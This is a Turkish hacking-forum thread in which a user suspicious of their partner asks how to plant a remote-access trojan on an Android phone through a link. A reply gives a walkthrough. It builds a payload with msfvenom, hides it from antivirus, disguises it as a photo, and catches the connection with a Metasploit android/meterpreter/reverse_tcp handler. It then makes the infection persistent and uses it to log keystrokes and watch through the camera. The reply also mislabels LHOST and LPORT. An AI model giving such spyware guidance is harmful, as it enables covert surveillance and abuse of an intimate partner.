Link üzerinden Android Telefona Rat Nasıl Atılır

L3ZAN

Yeni üye
22 Eyl 2022
5
3
Merhaba, uzun bir ilişkinin içindeyim son zamanlar da gittikçe şüphelerim artıyor. Bu sebeple başlıkta yazılan gibi link üzerinden veya benzer şekilde rat atabilir miyim? Daha önce hiç yapmadım.Yardımcı olursanız sevinirim. Teşekkürler

M

Mehmet sami

Ziyaretçi
Baştan anlatayım,
Bir telefona/Bilgisayara sızmak için önce Kali Linux (SANAL MAKİNA) işletim sistemin olması lazım (İndirebilirsin ücretsiz)

1. olarak payload oluşturman gerekiyor (Payload nedir) Sen Telefona sızdığın zaman sana istediğini yaptıracak program PAYLOAD nasıl oluşturuluyor ? Sana 2 tane program önereceğim (MSFVENOM, VEİL) Bana kalırsa Msfvenom kullan çünkü çok kolay ve hızlı

LHOST (HEDEF CİHAZ) LPORT (SİZSİNİZ) Çok titiz bir şekilde ayarlayın
2. Msfvenomdan Trojan Virüsünü oluşturdun, O RAT'I (FUD)laman gerekiyiyor (Antivirüslere karşı korunmalı) hale getirmen gerekiyor
3. Olarak Virüsü kamufile etmen gerekiyor (Bir fotoğraf, Program kullanabilirsin)
-Bak bu fotoğraf çok güzel, indir bunu
Fakat Fotoğrafı açınca virüs arka planda aktif hale gelecek
4. olarak Msfconsole açman gerekiyor
5. olarak use exploit/multi/handler yazman gerekiyor
6. olarak set PAYLOAD android/meterpreter/reverse_tcp yazman gerekiyor
7.
show options yazarak LHOST(hedef cihaz) LPORT(sizin portunuz)u çok titiz şekilde ayarlayın

8. Virüsü kurbana çalıştırın (bak bu fotoğraf çok güzel indir telefonuna) VB. Örnek
9. Tebrikler, Artık içindesin fakat kalıcı hale gelmen için virüsü işlem göçü ile ve bazı kodlar ile kalıcı hale getir
10.
Klavye tuş tıklamalarını görebilirsin, KAMERADAN FOTOĞRAF ÇEKEBİLİRSİN, Canlı izleyebilirsin kameradan
biraz yüzeysel anlattım ama RAT mantığı bu

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.